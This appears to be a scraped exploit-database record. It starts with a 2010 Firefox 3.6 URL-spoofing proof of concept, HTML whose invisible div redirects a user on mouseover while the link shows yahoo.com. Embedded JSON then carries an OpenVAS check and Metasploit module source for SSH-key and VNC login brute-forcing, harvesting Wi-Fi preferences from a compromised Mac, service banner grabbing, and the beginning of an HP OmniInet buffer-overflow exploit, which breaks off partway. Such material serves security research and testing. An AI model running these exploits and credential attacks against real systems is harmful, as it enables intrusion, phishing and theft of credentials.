ID 1337DAY-ID-11053 Type zdt Reporter unknown Modified 2010-02-24T00:00:00
Description
Exploit for unknown platform in category local exploits
===============================================
Mozilla Firefox v3.6 URL Spoofing Vulnerability
===============================================
# Tested on: Windows XP SP2/3
# Code :
# You can trick a user into accessing a malicious website by using
the following exploit
# The first link would be the malicious one.
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.youtube.com/watch?v=oHg5S
JYRHA0';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px"></div>
<br>
<a href="http://www.yahoo.com" onclick="updatebox(event)"><font
style="font-family:arial;font-
size:32px">http://www.yahoo.com</font></a><br>
</div>
</body>
</html>
# 0day.today [2018-01-24] #
{"published": "2010-02-24T00:00:00", "id": "1337DAY-ID-11053", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:30:04", "bulletin": {"published": "2010-02-24T00:00:00", "id": "1337DAY-ID-11053", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.1, "modified": "2016-04-20T02:30:04"}}, "hash": "63afaeb9bae7c7e4b05611ce6d09292f8e41bc085e7885619632b0c342f36a52", "description": "Exploit for unknown platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T02:30:04", "edition": 1, "title": "Mozilla Firefox v3.6 URL Spoofing Vulnerability", "href": "http://0day.today/exploit/description/11053", "modified": "2010-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/11053", "references": [], "reporter": "unknown", "sourceData": "===============================================\r\nMozilla Firefox v3.6 URL Spoofing Vulnerability\r\n===============================================\r\n\r\n# Tested on: Windows XP SP2/3\r\n# Code :\r\n# You can trick a user into accessing a malicious website by using\r\nthe following exploit\r\n# The first link would be the malicious one.\r\n \r\n \r\n<html>\r\n<body>\r\n<div id=\"mydiv\"\r\nonmouseover=\"document.location='http://www.youtube.com/watch?v=oHg5S\r\nJYRHA0';\"\r\nstyle=\"position:absolute;width:2px;height:2px;background:#FFFFFF;bor\r\nder:0px\"></div>\r\n \r\n<br>\r\n<a href=\"http://www.yahoo.com\" onclick=\"updatebox(event)\"><font\r\nstyle=\"font-family:arial;font-\r\nsize:32px\">http://www.yahoo.com</font></a><br>\r\n \r\n</div>\r\n</body>\r\n</html>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b7ede6e8036f313086125e60864bd281", "key": "sourceHref"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7bbb48bd90828ad578495d84e39fd617", "key": "title"}, {"hash": "8a3452e5f37e5a030c841a85e444cb50", "key": "href"}, {"hash": "55067a154b9cf4db30d4f43d84381460", "key": "sourceData"}, {"hash": "ad921d60486366258809553a3db49a4a", "key": "reporter"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category local exploits", "hash": "13a5562060724235b4c222b1fcd6d5be1e5e48e8955b9be9d98c45085766dbb0", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-01-24T19:22:40"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310874929"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5448"]}], "modified": "2018-01-24T19:22:40"}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-01-24T19:22:40", "edition": 2, "title": "Mozilla Firefox v3.6 URL Spoofing Vulnerability", "href": "https://0day.today/exploit/description/11053", "modified": "2010-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/11053", "references": [], "reporter": "unknown", "sourceData": "===============================================\r\nMozilla Firefox v3.6 URL Spoofing Vulnerability\r\n===============================================\r\n\r\n# Tested on: Windows XP SP2/3\r\n# Code :\r\n# You can trick a user into accessing a malicious website by using\r\nthe following exploit\r\n# The first link would be the malicious one.\r\n \r\n \r\n<html>\r\n<body>\r\n<div id=\"mydiv\"\r\nonmouseover=\"document.location='http://www.youtube.com/watch?v=oHg5S\r\nJYRHA0';\"\r\nstyle=\"position:absolute;width:2px;height:2px;background:#FFFFFF;bor\r\nder:0px\"></div>\r\n \r\n<br>\r\n<a href=\"http://www.yahoo.com\" onclick=\"updatebox(event)\"><font\r\nstyle=\"font-family:arial;font-\r\nsize:32px\">http://www.yahoo.com</font></a><br>\r\n \r\n</div>\r\n</body>\r\n</html>\r\n\r\n\r\n\n# 0day.today [2018-01-24] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "b176af9426cff8a77f89f1bb795155d2", "key": "href"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "modified"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ad921d60486366258809553a3db49a4a", "key": "reporter"}, {"hash": "653aae65eabde2cf63e0c9663ef08828", "key": "sourceData"}, {"hash": "9a605dd560ac66ec510ab8eae241bea4", "key": "sourceHref"}, {"hash": "7bbb48bd90828ad578495d84e39fd617", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"openvas": [{"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310874929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874929", "title": "Fedora Update for sox FEDORA-2018-f7a1334c68", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_f7a1334c68_sox_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for sox FEDORA-2018-f7a1334c68\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874929\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 06:35:14 +0200 (Wed, 15 Aug 2018)\");\n script_cve_id(\"CVE-2017-11332\", \"CVE-2017-11358\", \"CVE-2017-11359\", \"CVE-2017-15372\",\n \"CVE-2017-15642\", \"CVE-2017-15370\", \"CVE-2017-15371\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for sox FEDORA-2018-f7a1334c68\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"sox on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-f7a1334c68\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O5KW4OL54BD2Q43MB2AOQ652Y2HJPNE3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"sox\", rpm:\"sox~14.4.2.0~22.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2019-11-01T09:32:17", "bulletinFamily": "exploit", "description": "This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key, or several private keys in a single directory. Only a single passphrase is supported however, so it must either be shared between subject keys or only belong to a single one.\n", "modified": "2019-07-10T00:35:49", "published": "2014-08-01T19:47:08", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_LOGIN_PUBKEY", "href": "", "type": "metasploit", "title": "SSH Public Key Login Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/ssh'\nrequire 'metasploit/framework/login_scanner/ssh'\nrequire 'metasploit/framework/credential_collection'\nrequire 'sshkey'\nrequire 'net/ssh/command_stream'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::CommandShell\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::SSH::Options\n\n attr_accessor :ssh_socket, :good_key\n\n def initialize\n super(\n 'Name' => 'SSH Public Key Login Scanner',\n 'Description' => %q{\n This module will test ssh logins on a range of machines using\n a defined private key file, and report successful logins.\n If you have loaded a database plugin and connected to a database\n this module will record successful logins and hosts so you can\n track your access.\n\n Key files may be a single private key, or several private keys in a single\n directory. Only a single passphrase is supported however, so it must either\n be shared between subject keys or only belong to a single one.\n },\n 'Author' => ['todb', 'RageLtMan'],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(22),\n OptPath.new('KEY_PATH', [true, 'Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in \".pub\" will be skipped.']),\n OptString.new('KEY_PASS', [false, 'Passphrase for SSH private key(s)']),\n ], self.class\n )\n\n register_advanced_options(\n [\n Opt::Proxies,\n OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptString.new('SSH_KEYFILE_B64', [false, 'Raw data of an unencrypted SSH public key. This should be used by programmatic interfaces to this module only.', '']),\n OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),\n OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', false])\n ]\n )\n\n deregister_options('PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS','USERPASS_FILE','PASSWORD_SPRAY')\n\n @good_key = ''\n @strip_passwords = true\n\n end\n\n def rport\n datastore['RPORT']\n end\n\n def ip\n datastore['RHOST']\n end\n\n def session_setup(result, scanner, fingerprint)\n return unless scanner.ssh_socket\n\n # Create a new session from the socket\n conn = Net::SSH::CommandStream.new(scanner.ssh_socket)\n\n # Clean up the stored data - need to stash the keyfile into\n # a datastore for later reuse.\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => result.credential.public,\n 'SSH_KEYFILE_B64' => [result.credential.private].pack(\"m*\").gsub(\"\\n\",\"\"),\n 'KEY_PATH' => nil\n }\n\n info = \"SSH #{result.credential.public}:#{fingerprint} (#{ip}:#{rport})\"\n s = start_session(self, info, merge_me, false, conn.lsock)\n self.sockets.delete(scanner.ssh_socket.transport.socket)\n\n # Set the session platform\n s.platform = scanner.get_platform(result.proof)\n\n # Create database host information\n host_info = {host: scanner.host}\n\n unless s.platform == 'unknown'\n host_info[:os_name] = s.platform\n end\n\n report_host(host_info)\n\n s\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} SSH - Testing Cleartext Keys\")\n\n if datastore[\"USER_FILE\"].blank? && datastore[\"USERNAME\"].blank?\n # Ghetto abuse of the way OptionValidateError expects an array of\n # option names instead of a string message like every sane\n # subclass of Exception.\n raise OptionValidateError, [\"At least one of USER_FILE or USERNAME must be given\"]\n end\n\n keys = KeyCollection.new(\n key_path: datastore['KEY_PATH'],\n password: datastore['KEY_PASS'],\n user_file: datastore['USER_FILE'],\n username: datastore['USERNAME'],\n )\n\n keys = prepend_db_keys(keys)\n\n print_brute :level => :vstatus, :ip => ip, :msg => \"Testing #{keys.key_data.count} keys from #{datastore['KEY_PATH']}\"\n scanner = Metasploit::Framework::LoginScanner::SSH.new(\n host: ip,\n port: rport,\n cred_details: keys,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n proxies: datastore['Proxies'],\n connection_timeout: datastore['SSH_TIMEOUT'],\n framework: framework,\n framework_module: self,\n skip_gather_proof: !datastore['GatherProof']\n )\n\n scanner.verbosity = :debug if datastore['SSH_DEBUG']\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}'\"\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n tmp_key = result.credential.private\n ssh_key = SSHKey.new tmp_key\n session_setup(result, scanner, ssh_key.fingerprint) if datastore['CreateSession']\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Could not connect: #{result.proof}\"\n end\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n end\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n else\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n end\n end\n\n end\n\n class KeyCollection < Metasploit::Framework::CredentialCollection\n attr_accessor :key_data\n attr_accessor :key_path\n\n def initialize(opts={})\n super\n valid!\n end\n\n # Override CredentialCollection#has_privates?\n def has_privates?\n !@key_data.empty?\n end\n\n def realm\n nil\n end\n\n def valid!\n @key_data = Set.new\n if File.directory?(@key_path)\n @key_files ||= Dir.entries(@key_path).reject { |f| f =~ /^\\x2e|\\x2epub$/ }\n @key_files.each do |f|\n data = read_key(File.join(@key_path, f))\n @key_data << data if valid_key?(data)\n end\n elsif File.file?(@key_path)\n data = read_key(@key_path)\n @key_data << data if valid_key?(data)\n else\n raise RuntimeError, \"No key path\"\n end\n end\n\n def valid_key?(key_data)\n !!(key_data.match(/BEGIN [RECD]SA PRIVATE KEY/) && !key_data.match(/Proc-Type:.*ENCRYPTED/))\n end\n\n def each\n prepended_creds.each { |c| yield c }\n\n if @user_file.present?\n File.open(@user_file, 'rb') do |user_fd|\n user_fd.each_line do |user_from_file|\n user_from_file.chomp!\n each_key do |key_data|\n yield Metasploit::Framework::Credential.new(public: user_from_file, private: key_data, realm: realm, private_type: :ssh_key)\n end\n end\n end\n end\n\n if @username.present?\n each_key do |key_data|\n yield Metasploit::Framework::Credential.new(public: @username, private: key_data, realm: realm, private_type: :ssh_key)\n end\n end\n end\n\n def each_key\n @key_data.each do |data|\n yield data\n end\n end\n\n def read_key(filename)\n @cache ||= {}\n @cache[filename] ||= Net::SSH::KeyFactory.load_data_private_key(File.read(key_path), password, false, key_path).to_s\n @cache[filename]\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb"}, {"lastseen": "2019-12-02T14:14:34", "bulletinFamily": "exploit", "description": "This module will download OS X Airport Wireless preferences from the victim machine. The preferences file (which is a plist) contains information such as: SSID, Channels, Security Type, Password ID, etc.\n", "modified": "2017-07-24T13:26:21", "published": "2012-03-27T06:18:38", "id": "MSF:POST/OSX/GATHER/ENUM_AIRPORT", "href": "", "type": "metasploit", "title": "OS X Gather Airport Wireless Preferences", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'OS X Gather Airport Wireless Preferences',\n 'Description' => %q{\n This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sinn3r'],\n 'Platform' => [ 'osx' ],\n 'SessionTypes' => [ \"meterpreter\", \"shell\" ]\n ))\n end\n\n def exec(cmd)\n tries = 0\n begin\n out = cmd_exec(cmd).chomp\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n end\n end\n\n\n def get_air_preferences\n pref = exec(\"cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist\")\n return pref =~ /No such file or directory/ ? nil : pref\n end\n\n def save(data)\n p = store_loot(\n \"apple.airport.preferences\",\n \"plain/text\",\n session,\n data,\n \"com.apple.airport.preferences.plist\")\n\n print_good(\"#{@peer} - plist saved in #{p}\")\n end\n\n def run\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n # Download the plist. If not found (nil), then bail\n pref = get_air_preferences\n if pref.nil?\n print_error(\"#{@peer} - Unable to find airport preferences\")\n return\n end\n\n # Save the raw version of the plist\n save(pref)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/gather/enum_airport.rb"}, {"lastseen": "2019-10-23T20:33:18", "bulletinFamily": "exploit", "description": "This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.\n", "modified": "2019-06-27T22:06:32", "published": "2011-09-03T02:09:00", "id": "MSF:AUXILIARY/SCANNER/VNC/VNC_LOGIN", "href": "", "type": "metasploit", "title": "VNC Authentication Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/rfb'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/vnc'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n def initialize\n super(\n 'Name' => 'VNC Authentication Scanner',\n 'Description' => %q{\n This module will test a VNC server on a range of machines and\n report successful logins. Currently it supports RFB protocol\n version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response\n authentication method.\n },\n 'Author' =>\n [\n 'carstein <carstein.sec[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0506'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::Proxies,\n Opt::RPORT(5900),\n OptString.new('PASSWORD', [ false, 'The password to test' ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"vnc_passwords.txt\") ]),\n\n # We need to set the following options to make sure BLANK_PASSWORDS functions properly\n OptString.new('USERNAME', [false, 'A specific username to authenticate as', '<BLANK>']),\n OptBool.new('USER_AS_PASS', [false, 'Try the username as the password for all users', false])\n ])\n\n deregister_options('PASSWORD_SPRAY')\n\n register_autofilter_ports((5900..5910).to_a) # Each instance increments the port by one.\n\n # We don't currently support an auth mechanism that uses usernames, so we'll ignore any\n # usernames that are passed in.\n @strip_usernames = true\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting VNC login sweep\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::VNC.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['ConnectTimeout'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vnc/vnc_login.rb"}, {"lastseen": "2019-11-30T12:11:29", "bulletinFamily": "exploit", "description": "POP3 Banner Grabber\n", "modified": "2017-07-24T13:26:21", "published": "2010-02-26T19:06:26", "id": "MSF:AUXILIARY/SCANNER/POP3/POP3_VERSION", "href": "", "type": "metasploit", "title": "POP3 Banner Grabber", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'POP3 Banner Grabber',\n 'Description' => 'POP3 Banner Grabber',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(110)\n ])\n end\n\n def run_host(ip)\n begin\n connect\n banner = sock.get_once(-1, 30)\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n print_good(\"#{ip}:#{rport} POP3 #{banner_sanitized}\")\n report_service(:host => rhost, :port => rport, :name => \"pop3\", :info => banner)\n rescue ::Rex::ConnectionError\n rescue ::EOFError\n print_error(\"#{ip}:#{rport} - The service failed to respond\")\n rescue ::Exception => e\n print_error(\"#{ip}:#{rport} - #{e} #{e.backtrace}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/pop3/pop3_version.rb"}, {"lastseen": "2019-12-05T13:43:07", "bulletinFamily": "exploit", "description": "Enumerates the version of MySQL servers.\n", "modified": "2017-07-24T13:26:21", "published": "2010-01-15T02:55:08", "id": "MSF:AUXILIARY/SCANNER/MYSQL/MYSQL_VERSION", "href": "", "type": "metasploit", "title": "MySQL Server Version Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'MySQL Server Version Enumeration',\n 'Description' => %q{\n Enumerates the version of MySQL servers.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE\n )\n\n register_options([\n Opt::RPORT(3306)\n ])\n end\n\n # Based on my mysql-info NSE script\n def run_host(ip)\n begin\n s = connect(false)\n data = s.get_once(-1,10)\n disconnect(s)\n if data.nil?\n print_error \"The connection to #{rhost}:#{rport} timed out\"\n return\n end\n rescue ::Rex::ConnectionError, ::EOFError\n vprint_error(\"#{rhost}:#{rport} - Connection failed\")\n return\n rescue ::Exception\n print_error(\"Error: #{$!}\")\n return\n end\n\n offset = 0\n\n l0, l1, l2 = data[offset, 3].unpack('CCC')\n length = l0 | (l1 << 8) | (l2 << 16)\n\n # Read a bad amount of data\n return if length != (data.length - 4)\n\n offset += 4\n\n proto = data[offset, 1].unpack('C')[0]\n\n # Application-level error condition\n if proto == 255\n offset += 2\n err_msg = Rex::Text.to_hex_ascii(data[offset..-1].to_s)\n print_status(\"#{rhost}:#{rport} is running MySQL, but responds with an error: #{err_msg}\")\n report_service(\n :host => rhost,\n :port => rport,\n :name => \"mysql\",\n :info => \"Error: #{err_msg}\"\n )\n else\n offset += 1\n version = data[offset..-1].unpack('Z*')[0]\n print_good(\"#{rhost}:#{rport} is running MySQL #{version} (protocol #{proto})\")\n report_service(\n :host => rhost,\n :port => rport,\n :name => \"mysql\",\n :info => version\n )\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/mysql/mysql_version.rb"}, {"lastseen": "2019-11-21T23:29:22", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one.\n", "modified": "2017-07-24T13:26:21", "published": "2010-01-06T20:04:58", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_1", "href": "", "type": "metasploit", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the first one.\n },\n 'Author' =>\n [\n 'EgiX <n0b0d13s[at]gmail.com>',\n 'Fairuzan Roslan <riaf[at]mysec.org>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2007-2280' ],\n [ 'BID', '37396' ],\n [ 'OSVDB', '61206' ],\n [ 'ZDI', '09-099' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 4658+66,\n 'BadChars' => \"\\x00\", # (we don't want \\x00\\x00)\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n # DP Targets\n [ 'HP OpenView Storage Data Protector A.05.50: 